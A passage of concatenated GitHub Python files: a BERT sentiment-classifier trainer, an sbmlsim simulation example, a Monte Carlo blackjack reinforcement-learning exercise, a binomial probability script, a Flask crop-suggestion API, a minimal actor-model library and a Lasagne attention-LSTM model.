pd.read_csv(\"/home/wangfanyu/project/GraphDecoder/data/Weibo/test2.csv\")\n labels = test_file[\"label\"]\n texts = test_file[\"text\"]\n for label, text in zip(labels, texts):\n strip_line = text.strip()\n predict_label = self.do_correct(strip_line)\n current_count += 1\n if predict_label == label:\n correct_count += 1\n\n print(correct_count / current_count)\n\n def train(self, train_data, epoch, train=True):\n str_code = \"train\" if train else \"val\"\n self.model.to(self.device)\n self.model.train()\n self.kozmo_decoder.to(self.device)\n self.kozmo_decoder.train()\n data_loader = tqdm.tqdm(enumerate(train_data),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(train_data),\n bar_format=\"{l_bar}{r_bar}\")\n current_iter = 1\n c_correct = 0\n w_correct = 0\n c_total = 0\n w_total = 0\n avg_loss_m = 0\n iter_loss_m = 0\n for step, data in data_loader:\n # 1. Data Preprocess\n label = data[\"label\"]\n input_ids = data[\"input_text\"]\n input_mask = (input_ids > 0).int()\n encoder_out, _ = self.model(input_ids, input_mask)\n classifier_out, kozmo_dis = self.kozmo_decoder(encoder_out)\n ce_loss_fun = nn.CrossEntropyLoss()\n correction_loss = ce_loss_fun(classifier_out,\n label.view(-1).long())\n loss = correction_loss\n decoder_out = torch.argmax(classifier_out, dim=-1)\n c_correct += torch.sum(\n torch.eq(decoder_out[label == 1],\n label[label == 1])).item() #\n w_correct += torch.sum(\n torch.eq(decoder_out[label == 0],\n label[label == 0])).item() #\n c_total += torch.sum(label == 1).item()\n w_total += torch.sum(label == 0).item()\n avg_loss_m += correction_loss.item()\n iter_loss_m += correction_loss.item()\n self.lm_optimizer.zero_grad()\n correction_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), max_norm=self.max_grad_norm) #\n torch.nn.utils.clip_grad_norm_(self.kozmo_decoder.parameters(), max_norm=self.max_grad_norm) #\n\n if (step + 1) % self.gradient_accumulation_steps == 0:\n self.lm_optimizer.step()\n self.lm_scheduler.step()\n avg_loss_m += correction_loss.item()\n iter_loss_m += correction_loss.item()\n post_fix = {\n \"epoch\": epoch,\n \"iter\": step,\n \"avg_loss_c\": \"%.2f\" % (avg_loss_m / (step + 1)),\n \"iter_loss_m\": \"%.2f\" % (iter_loss_m / current_iter),\n \"iter_c\": str(c_correct) + \"/\" + str(c_total),\n \"iter_w\": str(w_correct) + \"/\" + str(w_total),\n }\n\n if step % self.log_freq == 0:\n iter_loss_m = 0\n current_iter = 100\n c_total = 0\n w_total = 0\n c_correct = 0\n w_correct = 0\n data_loader.write(str(post_fix))\n\n print(\"EP%d_%s, correct_avg_loss=\" % (epoch, str_code), avg_loss_m / len(data_loader))\n return avg_loss_m / len(data_loader)\n\n\nclass ClassifyDataset(Dataset):\n def __init__(self, dataset, max_length, device):\n self.dataset = dataset\n self.data_size = len(dataset)\n self.device = torch.device(device)\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\", local_files_only=True)\n self.max_size = max_length\n\n def __len__(self):\n return self.data_size\n\n def __getitem__(self, item):\n item = self.dataset.iloc[item]\n label = item['label']\n input_text = self.tokenizer(item['text'], padding='max_length', max_length=512)[\"input_ids\"]\n\n output = {\n 'label': torch.tensor(label, device=self.device),\n 'input_text': torch.tensor(input_text, device=self.device),\n }\n\n return {key: value for key, value in output.items()}\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n 
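    # Standalone illustration (toy values, runnable on its own) of the torch.eq\n    # per-class accuracy counting used in Trainer.train above:\n    #     import torch\n    #     logits = torch.tensor([[2.0, 0.1], [0.2, 1.5], [1.0, 0.3]])\n    #     labels = torch.tensor([0, 1, 1])\n    #     preds = torch.argmax(logits, dim=-1)                  # tensor([0, 1, 0])\n    #     pos_ok = torch.sum(torch.eq(preds[labels == 1], labels[labels == 1]))\n    #     neg_ok = torch.sum(torch.eq(preds[labels == 0], labels[labels == 0]))\n    #     print(pos_ok.item(), neg_ok.item())                   # -> 1 1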
parser.add_argument(\"-c\", \"--dataset\", type=str, default=rootPath + \"/data\",\n help=\"train dataset\")\n parser.add_argument(\"-m\", \"--model_path\", type=str,\n default=\"\",\n help=\"model save path\")\n parser.add_argument(\"-e\", \"--epoch\", type=int,\n default=3,\n help=\"training_epoch\")\n parser.add_argument(\"-l\", \"--learning_rate\", type=float,\n default=8e-6,\n help=\"learning rate for classification task\")\n args = parser.parse_args()\n torch.manual_seed(1)\n config = config()\n train = pd.read_csv(args.dataset + \"/Weibo/train2.csv\")\n train = ClassifyDataset(train, max_length=config.max_length, device=config.device)\n\n train = DataLoader(train, batch_size=32, num_workers=0)\n print(args.epoch)\n print(args.learning_rate)\n trainer = Trainer(config=config, save_path=rootPath + args.model_path, epoch=int(train.dataset.data_size / train.batch_size) * args.epoch, lr=args.learning_rate)\n for e in range(args.epoch):\n trainer.train(train, e)\n trainer.save()\n trainer.sighan_eval()\n","repo_name":"ColeGroup/W2CSpace","sub_path":"driver/senti_classify.py","file_name":"senti_classify.py","file_ext":"py","file_size_in_byte":15883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1706620193","text":"\"\"\"\nExample simulation experiment.\n\"\"\"\nfrom pathlib import Path\nfrom typing import Dict, Union\n\nfrom sbmlsim.combine.sedml.report import Report\nfrom sbmlsim.data import Data\nfrom sbmlsim.experiment import ExperimentRunner, SimulationExperiment\nfrom sbmlsim.model import AbstractModel\nfrom sbmlsim.plot import Figure, Plot\nfrom sbmlsim.simulation import AbstractSim, Timecourse, TimecourseSim\nfrom sbmlsim.simulator.rr_simulator_ray import SimulatorParallel\nfrom sbmlsim.task import Task\n\n\nclass CurveTypesExperiment(SimulationExperiment):\n \"\"\"Simulation experiments for curve types.\"\"\"\n\n def models(self) -> Dict[str, Union[Path, AbstractModel]]:\n \"\"\"Define models.\"\"\"\n return {\n \"model\": Path(__file__).parent / \"results\" / \"curve_types_model.xml\",\n }\n\n def simulations(self) -> Dict[str, AbstractSim]:\n \"\"\"Define simulations.\"\"\"\n tc = TimecourseSim(\n timecourses=Timecourse(start=0, end=10, steps=10),\n time_offset=0,\n )\n return {\"tc\": tc}\n\n def tasks(self) -> Dict[str, Task]:\n \"\"\"Define tasks.\"\"\"\n tasks = dict()\n for model in [\"model\"]:\n tasks[f\"task_{model}_tc\"] = Task(model=model, simulation=\"tc\")\n return tasks\n\n def data(self) -> Dict[str, Data]:\n \"\"\"Define data generators.\"\"\"\n # direct access via id\n data = []\n for model in [\"model\"]:\n for selection in [\"time\", \"S1\", \"S2\", \"[S1]\", \"[S2]\"]:\n data.append(Data(task=f\"task_{model}_tc\", index=selection))\n return {d.sid: d for d in data}\n\n def reports(self) -> Dict[str, Report]:\n \"\"\"Define reports.\"\"\"\n report1 = Report(\n sid=\"report1\",\n datasets={\n sid: f\"task_model_tc__{sid}\"\n for sid in [\"time\", \"S1\", \"S2\", \"[S1]\", \"[S2]\"]\n },\n )\n return {report1.sid: report1}\n\n def figures(self) -> Dict[str, Figure]:\n \"\"\"Define figure outputs (plots).\"\"\"\n fig = Figure(\n experiment=self,\n sid=\"figure0\",\n name=\"Example curve type\",\n num_cols=1,\n num_rows=1,\n width=5,\n height=5,\n )\n\n # FIXME: add helper to easily create figure layouts with plots\n p0 = fig.add_subplot(Plot(sid=\"plot0\", name=\"Timecourse\"), row=1, col=1)\n p0.set_title(f\"Timecourse\")\n p0.set_xaxis(\"time\", unit=\"min\")\n p0.set_yaxis(\"data\", unit=\"mM\")\n\n 
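        # The tasks() method above pairs every model with every simulation; the\n        # naming scheme is a plain cross product (illustrative sketch, plain dicts\n        # standing in for sbmlsim objects):\n        #     tasks = {f\"task_{m}_{s}\": (m, s) for m in [\"model\"] for s in [\"tc\"]}\n        #     # -> {\"task_model_tc\": (\"model\", \"tc\")}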
p0.curve(\n x=Data(\"time\", task=f\"task_model_tc\"),\n y=Data(\"[S1]\", task=f\"task_model_tc\"),\n label=f\"[S1]\",\n )\n\n return {\n fig.sid: fig,\n }\n\n\ndef run_curve_types_experiments(output_path: Path) -> Path:\n \"\"\"Run simulation experiments.\"\"\"\n base_path = Path(__file__).parent\n data_path = base_path\n\n runner = ExperimentRunner(\n CurveTypesExperiment,\n simulator=SimulatorParallel(),\n data_path=data_path,\n base_path=base_path,\n )\n _results = runner.run_experiments(\n output_path=output_path / \"results\", show_figures=True\n )\n\n\nif __name__ == \"__main__\":\n run_curve_types_experiments(Path(__file__).parent / \"results\")\n","repo_name":"matthiaskoenig/sbmlsim","sub_path":"src/sbmlsim/examples/experiments/curve_types/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"35"} +{"seq_id":"13189694884","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n# 0 means hit aka pick cards\n# 1 means stick aka stop picking cards\npolicy_player = np.zeros(22, dtype=np.int)\npolicy_player[20:] = 1\n\npolicy_dealer = np.zeros(22, dtype=np.int)\npolicy_dealer[17:] = 1\n\n# picking an ace gives value as 11\n# picking face cards give value as 10\nall_card_values_with_usable_ace = np.array([11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10])\n\ndef comp(a, b):\n return int(a > b) - int(a < b)\n\ndef initialize(initial_state=None):\n if initial_state is not None:\n player_card_sum, player_usable_ace, dealer_card_face_up = initial_state\n dealer_card_2 = np.random.choice(all_card_values_with_usable_ace)\n dealer_card_sum = dealer_card_face_up + dealer_card_2\n dealer_usable_ace = (11 in [dealer_card_face_up, dealer_card_2])\n if dealer_card_sum > 21:\n dealer_card_sum -= 10\n state = initial_state\n player_card_history = []\n else:\n player_card_sum, dealer_card_sum = 0, 0\n player_usable_ace, dealer_usable_ace = False, False\n player_card_history = []\n\n while player_card_sum < 12:\n card = np.random.choice(all_card_values_with_usable_ace)\n player_card_sum += card\n\n if player_card_sum > 21:\n # the previous sum would have been 11 before adding a new card\n # (since if previous sum is < 11 (suppose 10), then new sum is at max 21\n # as 11 is the card with the highest value, which doesn't violate the condition)\n # the new card has to be 11 for sum to exceed 21, which makes the new sum as 22\n # this makes us go bust, and thus, the last ace's value should be taken as 1\n player_card_sum -= 10\n else:\n player_usable_ace = player_usable_ace | (card == 11)\n \n dealer_initial_cards = np.random.choice(all_card_values_with_usable_ace, 2)\n dealer_card_sum += np.sum(dealer_initial_cards)\n dealer_usable_ace = dealer_usable_ace | (11 in dealer_initial_cards)\n\n if dealer_card_sum > 21:\n dealer_card_sum -= 10\n\n dealer_card_face_up = np.random.choice(dealer_initial_cards)\n state = (player_card_sum, player_usable_ace, dealer_card_face_up)\n\n return player_card_sum, dealer_card_sum, player_usable_ace, dealer_usable_ace, dealer_card_face_up, state, player_card_history\n\ndef simulate_player_turn(state, player_card_history, policy=None, initial_action=None, **kwargs):\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n\n while True:\n if initial_action is not None:\n action = initial_action\n initial_action = None\n else:\n if policy is None:\n 
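                # No behaviour policy supplied: fall back to the fixed target\n                # policy (policy_player sticks only on 20 or 21, hits otherwise)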
action = policy_player[player_card_sum]\n else:\n action = policy(player_card_sum, player_usable_ace, dealer_card_face_up, **kwargs)\n \n new_state = (player_card_sum, player_usable_ace, dealer_card_face_up)\n player_card_history.append([new_state, action])\n\n # stick\n if action == 1:\n return 'stick', player_card_sum, new_state, player_card_history\n \n # hit\n else:\n card = np.random.choice(all_card_values_with_usable_ace)\n num_aces = 1 if player_usable_ace else 0\n if card == 11:\n num_aces += 1\n player_card_sum += card\n\n while player_card_sum > 21 and num_aces > 0:\n player_card_sum -= 10\n num_aces -= 1\n\n if player_card_sum > 21:\n reward = -1\n return state, reward, player_card_history\n \n if num_aces == 1:\n player_usable_ace = True\n else:\n player_usable_ace = False\n\ndef simulate_dealer_turn(state, dealer_card_sum, dealer_usable_ace, player_card_history):\n while True:\n action = policy_dealer[dealer_card_sum]\n\n # stick\n if action == 1:\n return 'stick', dealer_card_sum, state, player_card_history\n \n # hit\n else:\n card = np.random.choice(all_card_values_with_usable_ace)\n num_aces = 1 if dealer_usable_ace else 0\n if card == 11:\n num_aces += 1\n dealer_card_sum += card\n\n while dealer_card_sum > 21 and num_aces > 0:\n dealer_card_sum -= 10\n num_aces -= 1\n\n if dealer_card_sum > 21:\n reward = 1\n return state, reward, player_card_history\n \n if num_aces == 1:\n dealer_usable_ace = True\n else:\n dealer_usable_ace = False\n \ndef simulate_play(policy=None, initial_state=None, initial_action=None, **kwargs):\n player_card_sum, dealer_card_sum, player_usable_ace, \\\n dealer_usable_ace, dealer_card_face_up, \\\n state, player_card_history = initialize(initial_state)\n\n player_turn_result = simulate_player_turn(state, player_card_history, policy, initial_action, **kwargs)\n if len(player_turn_result) == 4:\n _, player_card_sum, state, player_card_history = player_turn_result\n else:\n return player_turn_result\n\n dealer_turn_result = simulate_dealer_turn(state, dealer_card_sum, dealer_usable_ace, player_card_history)\n if len(dealer_turn_result) == 4:\n _, dealer_card_sum, state, player_card_history = dealer_turn_result\n else:\n return dealer_turn_result\n\n reward = comp(player_card_sum, dealer_card_sum)\n return state, reward, player_card_history\n\ndef argmax_policy(player_card_sum, player_usable_ace, dealer_card_face_up, **kwargs):\n state_actions = kwargs['state_actions']\n state_actions_count = kwargs['state_actions_count']\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n state_action_values = state_actions[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, :] / \\\n state_actions_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, :]\n max_state_action_value = np.amax(state_action_values)\n all_actions_with_max_value = [i for i, a in enumerate(state_action_values) if a == max_state_action_value]\n return np.random.choice(all_actions_with_max_value)\n\ndef MC_on_policy(num_episodes):\n states = np.zeros((2, 10, 10))\n states_ace_count = np.ones((2, 10, 10))\n\n for i in range(num_episodes):\n _, reward, player_history = simulate_play()\n for (state, _) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n states_ace_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1] += 1\n states[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1] += reward\n \n return states / 
states_ace_count\n\ndef MC_ES(num_episodes):\n state_actions = np.zeros((2, 10, 10, 2))\n state_actions_count = np.full((2, 10, 10, 2), 1)\n \n for i in range(num_episodes):\n random_usable_ace = bool(np.random.choice([0, 1]))\n random_player_card_sum = np.random.choice(np.arange(12, 22))\n random_dealer_card_face_up = np.random.choice(all_card_values_with_usable_ace)\n random_initial_state = (random_player_card_sum, random_usable_ace, random_dealer_card_face_up)\n random_initial_action = np.random.choice([0, 1])\n\n if i==0:\n policy = None\n else:\n policy = argmax_policy\n \n _, reward, player_history = simulate_play(policy, random_initial_state, random_initial_action, **{'state_actions': state_actions, 'state_actions_count': state_actions_count})\n for (state, action) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n if dealer_card_face_up == 11:\n dealer_card_face_up = 1\n state_actions[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, action] += reward\n state_actions_count[int(player_usable_ace), player_card_sum-12, dealer_card_face_up-1, action] += 1\n \n return state_actions / state_actions_count\n\ndef MC_off_policy(num_episodes):\n def behaviour_policy_for_player(player_card_sum, player_usable_ace, dealer_card_face_up):\n coin_toss = np.random.binomial(1, 0.5)\n if coin_toss == 1:\n return 1\n else:\n return 0\n\n initial_state = (13, True, 2)\n\n all_ratios = np.zeros(num_episodes)\n all_returns = np.zeros(num_episodes)\n\n for i in range(num_episodes):\n _, reward, player_history = simulate_play(behaviour_policy_for_player, initial_state)\n num, den = 1, 1\n for (state, action) in player_history:\n player_card_sum, player_usable_ace, dealer_card_face_up = state\n target_action = policy_player[player_card_sum]\n if action == target_action:\n den *= 0.5\n else:\n num = 0\n break\n all_ratios[i] = num / den\n all_returns[i] = reward\n\n weighted_returns = np.cumsum(all_ratios * all_returns)\n all_ratios = np.cumsum(all_ratios)\n T_S = np.arange(1, num_episodes+1)\n\n ordinary_sampling = weighted_returns / T_S\n weighted_sampling = np.where(all_ratios!=0, weighted_returns / all_ratios, 0)\n\n return ordinary_sampling, weighted_sampling\n\ndef fig_1():\n states_1 = MC_on_policy(10000)\n states_2 = MC_on_policy(500000)\n\n titles = ['Usable Ace, 10000 Episodes',\n 'Usable Ace, 500000 Episodes',\n 'No Usable Ace, 10000 Episodes',\n 'No Usable Ace, 500000 Episodes']\n\n states_order = [states_1[1], states_2[1], states_1[0], states_2[0]]\n\n fig, ax = plt.subplots(2, 2, figsize=(40, 30), subplot_kw={'projection': '3d'})\n plt.subplots_adjust(wspace=0.1, hspace=0.2)\n \n card_labels = ['A']\n card_labels.extend(range(2, 11, 1))\n for i in range(2):\n for j in range(2):\n index = i*2 + j\n xs, ys = np.meshgrid(range(10), range(10))\n ax[i, j].set_zlim(-1, 1)\n ax[i, j].set_xticks(ticks=range(0, 10, 1))\n ax[i, j].set_xticklabels(card_labels)\n ax[i, j].set_yticks(ticks=range(0, 10, 1))\n ax[i, j].set_yticklabels(range(12, 22, 1))\n ax[i, j].set_xlabel('Dealer Showing')\n ax[i, j].set_ylabel('Player Sum')\n ax[i, j].set_title(titles[index])\n ax[i, j].plot_surface(xs, ys, states_order[index], rstride=1, cstride=1, cmap='hot')\n \n plt.show()\n\ndef fig_2():\n state_action_values = MC_ES(500000)\n\n state_action_values_non_usable_ace = state_action_values[0]\n state_action_values_usable_ace = state_action_values[1]\n\n state_values_non_usable_ace = np.amax(state_action_values_non_usable_ace, axis=2)\n state_values_usable_ace = 
np.amax(state_action_values_usable_ace, axis=2)\n \n action_non_usable_ace = np.argmax(state_action_values_non_usable_ace, axis=2)\n action_usable_ace = np.argmax(state_action_values_usable_ace, axis=2)\n\n plots = [action_usable_ace, state_values_usable_ace, action_non_usable_ace, state_values_non_usable_ace]\n\n card_labels = ['A']\n card_labels.extend(range(2, 11, 1))\n xs, ys = np.meshgrid(range(10), range(10))\n\n fig = plt.figure()\n ax = fig.add_subplot(2, 2, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(21, 11, -1))\n ax.set_title('Usable Ace PI*')\n ax.imshow(np.flipud(plots[0]), cmap='YlGnBu')\n\n ax = fig.add_subplot(2, 2, 2, projection='3d')\n ax.set_zlim(-1, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(12, 22, 1))\n ax.set_xlabel('Dealer Showing')\n ax.set_ylabel('Player Sum')\n ax.set_title('Usable Ace V*')\n ax.plot_surface(xs, ys, plots[1], rstride=1, cstride=1, cmap='hot')\n\n ax = fig.add_subplot(2, 2, 3)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(21, 11, -1))\n ax.set_title('No Usable Ace PI*')\n ax.imshow(np.flipud(plots[2]), cmap='YlGnBu')\n\n ax = fig.add_subplot(2, 2, 4, projection='3d')\n ax.set_zlim(-1, 1)\n ax.set_xticks(ticks=range(0, 10, 1))\n ax.set_xticklabels(card_labels)\n ax.set_yticks(ticks=range(0, 10, 1))\n ax.set_yticklabels(range(12, 22, 1))\n ax.set_xlabel('Dealer Showing')\n ax.set_ylabel('Player Sum')\n ax.set_title('No Usable Ace V*')\n ax.plot_surface(xs, ys, plots[3], rstride=1, cstride=1, cmap='hot')\n\n plt.show()\n\ndef fig_3():\n np.random.seed(42)\n true_val = -0.27726\n num_episodes = 10000\n num_runs = 100\n\n ordinary_sampling_errors = np.zeros(num_episodes)\n weighted_sampling_errors = np.zeros(num_episodes)\n\n for each_run in range(num_runs):\n ordinary_sampling, weighted_sampling = MC_off_policy(num_episodes)\n ordinary_error = np.power(ordinary_sampling - true_val, 2)\n weighted_error = np.power(weighted_sampling - true_val, 2)\n ordinary_sampling_errors += ordinary_error\n weighted_sampling_errors += weighted_error\n\n ordinary_sampling_errors /= num_runs\n weighted_sampling_errors /= num_runs\n\n plt.figure()\n plt.plot(ordinary_sampling_errors, label='Ordinary Importance Sampling')\n plt.plot(weighted_sampling_errors, label='Weighted Importance Sampling')\n plt.xlabel('Episodes (log scale)')\n plt.ylabel('Mean square error')\n plt.xscale('log')\n plt.legend(loc='best')\n plt.ylim([-0.5, 8])\n plt.show()\n\nif __name__ == '__main__':\n fig_1()\n fig_2()\n fig_3()","repo_name":"madhur-tandon/RL-2019","sub_path":"HW3/2016053_Q4.py","file_name":"2016053_Q4.py","file_ext":"py","file_size_in_byte":13981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"750193258","text":"numbers = list(map(float,input().split()))\np = numbers[0] / (numbers[0] + numbers[1])\nn = 6\n\ndef factorial(n):\n if n==1 or n==0:\n return 1\n elif n>1:\n return factorial(n-1)*n\n\ndef binomial(x,n,p):\n f = factorial(n) / (factorial(n-x) * factorial(x))\n return (f * p**x * (1.0 - p)**(n-x))\n\n\nresult = binomial(3,n,p) + binomial(4,n,p) + binomial(5,n,p) + 
binomial(6,n,p)\nprint(round(result,3))","repo_name":"mayraguajardo/10-Days-of-Statistics-HackerRank","sub_path":"binomial_distribution_1.py","file_name":"binomial_distribution_1.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12393094298","text":"from flask import Flask, request, render_template, jsonify\r\nimport client\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/join', methods=['GET','POST'])\r\ndef my_form_post():\r\n lat_in = request.form['lat']\r\n #word = request.args.get('lat')\r\n long_in = request.form['lon']\r\n district=request.form['district']\r\n area=request.form['area']\r\n\r\n res = client.suggest_crops(lat_in,long_in,district,area)\r\n \r\n result = {\r\n \"output\": res\r\n }\r\n result = {str(key): value for key, value in result.items()}\r\n return jsonify(result=result)\r\n\r\n@app.route('/api', methods=['POST'])\r\ndef my_api_post(): \r\n request_data=request.get_json() \r\n\r\n lat_in = float(request_data['lat'])\r\n #word = request.args.get('lat')\r\n long_in = float(request_data['lon'])\r\n district=request_data['district']\r\n area=float(request_data['area'])\r\n if(lat_in<9.9477 or lat_in >20.0210 or long_in<70.8157 or long_in > 85.1463):\r\n return jsonify({\"error\" : \"Coordinates out of range\"})\r\n res = client.suggest_crops(lat_in,long_in,district,area)\r\n \r\n result = {\r\n \"output\": res\r\n }\r\n \r\n result = {str(key): value for key, value in result.items()}\r\n return jsonify(result=result)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"Dhruvvvx17/Capstone-Project","sub_path":"Review3Capstone2/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"3825831748","text":"#! 
/usr/bin/env python\n'''\nAn simple implementation of the Actor model.\n'''\n\nimport logging\nimport inspect\nfrom collections import deque, defaultdict\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nglobal_actors = set()\nglobal_actors_by_id = defaultdict(dict)\nglobal_event_queue = deque()\nglobal_callbacks = defaultdict(set)\n\n# Messages that can be emitted by Actors\nKILL = object() # Kill an actor\nHALT = object() # Halt the main loop\n\n# Messages that can be emitted by Director\nINITIATE = object() # First action when the loop starts\nFINISH = object() # Las action before the loop ends\n\n# Special on values\nANY = object() # @on(ANY) trigger for any message\n\n\ndef reset():\n '''Reset simpleactors global registries.'''\n global_actors.clear()\n global_actors_by_id.clear()\n global_event_queue.clear()\n global_callbacks.clear()\n\n\ndef get_by_id(class_, uid):\n '''Return an object by it's id'''\n return global_actors_by_id[class_].get(uid, None)\n\n\ndef on(message):\n '''Decorator that register a class method as callback for a message.'''\n def decorator(function):\n try:\n function._callback_messages.append(message)\n except AttributeError:\n function._callback_messages = [message]\n return function\n return decorator\n\n\nclass Actor:\n\n '''An actor that reacts to events.\n\n Args:\n auto_plug - if True (default) the actor will automatically plug itself\n into the mail event loop.\n '''\n\n def __init__(self, uid=None, auto_plug=True):\n self.id = id(self) if uid is None else uid\n global_actors.add(self)\n if self.id in global_actors_by_id[self.__class__]:\n msg = 'A \"{}\" instance with id \"{}\" has been already created.'\n raise ValueError(msg.format(self.__class__, self.id))\n global_actors_by_id[self.__class__][self.id] = self\n self.__plugged = False\n if auto_plug:\n self.plug()\n\n def plug(self):\n '''Add the actor's methods to the callback registry.'''\n if self.__plugged:\n return\n for _, method in inspect.getmembers(self, predicate=inspect.ismethod):\n if hasattr(method, '_callback_messages'):\n for message in method._callback_messages:\n global_callbacks[message].add(method)\n self.__plugged = True\n\n def unplug(self):\n '''Remove the actor's methods from the callback registry.'''\n if not self.__plugged:\n return\n members = set([method for _, method\n in inspect.getmembers(self, predicate=inspect.ismethod)])\n for message in global_callbacks:\n global_callbacks[message] -= members\n self.__plugged = False\n\n @property\n def is_plugged(self):\n '''Return True if the actor is listening for messages.'''\n return self.__plugged\n\n def emit(self, message, *args, **kwargs):\n '''Emit an event.'''\n global_event_queue.append((message, self, args, kwargs))\n\n\nclass Director(Actor):\n\n '''Orchestrate all actors.'''\n\n def process_event(self, event):\n message, emitter, args, kwargs = event\n for callback in global_callbacks[message]:\n callback(message, emitter, *args, **kwargs)\n for callback in global_callbacks[ANY]:\n callback(message, emitter, *args, **kwargs)\n\n def run(self):\n '''Run until there are no events to be processed.'''\n # We left-append rather than emit (right-append) because some message\n # may have been already queued for execution before the director runs.\n global_event_queue.appendleft((INITIATE, self, (), {}))\n while global_event_queue:\n self.process_event(global_event_queue.popleft())\n\n @property\n def actors(self):\n ret = global_actors.copy()\n ret.remove(self)\n return ret\n\n @on(KILL)\n def 
kill(self, event, emitter, target, **kwargs):\n        target.unplug()\n        global_actors.remove(target)\n\n    @on(HALT)\n    def halt(self, message, emitter, *args, **kwargs):\n        '''Halt the execution of the loop.'''\n        self.process_event((FINISH, self, (), {}))\n        global_event_queue.clear()\n","repo_name":"quasipedia/simpleactors","sub_path":"simpleactors.py","file_name":"simpleactors.py","file_ext":"py","file_size_in_byte":4261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16863287969","text":"import theano\nfrom theano import tensor as T\nfrom theano import config\nimport lasagne\nfrom lasagne.layers import DenseLayer,DimshuffleLayer,get_output, DropoutLayer, ReshapeLayer, InputLayer, MergeLayer,FlattenLayer,LSTMLayer, Conv1DLayer,ConcatLayer\nfrom lasagne.objectives import categorical_crossentropy, aggregate,binary_crossentropy,binary_accuracy,categorical_accuracy\n\nimport numpy as np\nfrom lasagne import utils\nlasagne.random.set_rng(np.random.RandomState(123))\nclass attention_reduce_layer(MergeLayer):\n\tdef __init__(self,input,attention,mask,**kwargs):\n\t\tsuper(attention_reduce_layer,self).__init__([input,attention,mask],**kwargs)\n\t\t#self.mask=mask\n\tdef get_output_shape_for(self,input_shapes):\n\t\tin1_shape,in2_shape,mask_shape=input_shapes\n\t\treturn (in1_shape[0],in1_shape[2])\n\tdef get_output_for(self,inputs,deterministic=False,**kwargs):\n\t\tinput, attention,mask=inputs### input.shape=(batchsize,timestep,featdim) attention.shape=(batchsize,featuredim,timestep)\n\t\tweight=attention.sum(axis=1)\n\t\tweight=T.exp(weight-weight.max(axis=1,keepdims=True))\n\t\tweight=weight*mask\n\t\tweight=weight/weight.sum(axis=1,keepdims=True)\n\t\treturn (input*weight[:,:,None]).sum(axis=1)\n\t\t\ndef model_build():\n\tx = T.tensor3('x', dtype=config.floatX)\n\tm = T.matrix('mask',dtype=config.floatX)\n\ty = T.vector('y',dtype='int32')\n\tg = T.vector('g',dtype='int32')\n\toutput=InputLayer(shape=(None,None,64),input_var=x)\n\tmask=InputLayer(shape=(None,None),input_var=m)\n\tmask=DimshuffleLayer(mask,(1,0))\n\toutput=DenseLayer(output,num_units=32,num_leading_axes=2)\n\t\n\toutput=ReshapeLayer(output,([1],[2],[0]))\n\toutput=Conv1DLayer(output,32,11,pad='same')\n\toutput=ReshapeLayer(output,([0],[2],[1]))\n\t\n\t\n\toutput_fw=LSTMLayer(output,32,peepholes=False,mask_input=mask)\n\toutput_bw=LSTMLayer(output,32,peepholes=False,backwards=True,mask_input=mask)\n\t\n\toutput_fw_attention=ReshapeLayer(output_fw,([0],[2],[1]))\n\tattention_fw=Conv1DLayer(output_fw_attention,12,11,pad='same')\n\toutput_fw=attention_reduce_layer(output_fw,attention_fw,mask)\n\t\n\toutput_bw_attention=ReshapeLayer(output_bw,([0],[2],[1]))\n\tattention_bw=Conv1DLayer(output_bw_attention,12,11,pad='same')\n\toutput_bw=attention_reduce_layer(output_bw,attention_bw,mask)\n\t\n\toutput=ConcatLayer([output_fw,output_bw],axis=1)\n\tout=DenseLayer(output,num_units=4,nonlinearity=T.nnet.softmax)\n\tmw=DenseLayer(output,num_units=1,nonlinearity=lasagne.nonlinearities.sigmoid)\n\tout_predictions,mw_predictions=get_output([out,mw])\n\tloss=categorical_crossentropy(out_predictions,y)\n\tloss = aggregate(loss, mode='mean')\n\tmw_loss=binary_crossentropy(mw_predictions,g)\n\tmw_loss=aggregate(mw_loss,mode='mean')\n\ttotal_loss=loss+mw_loss\n\t\n\toutput_params=lasagne.layers.get_all_params(output, 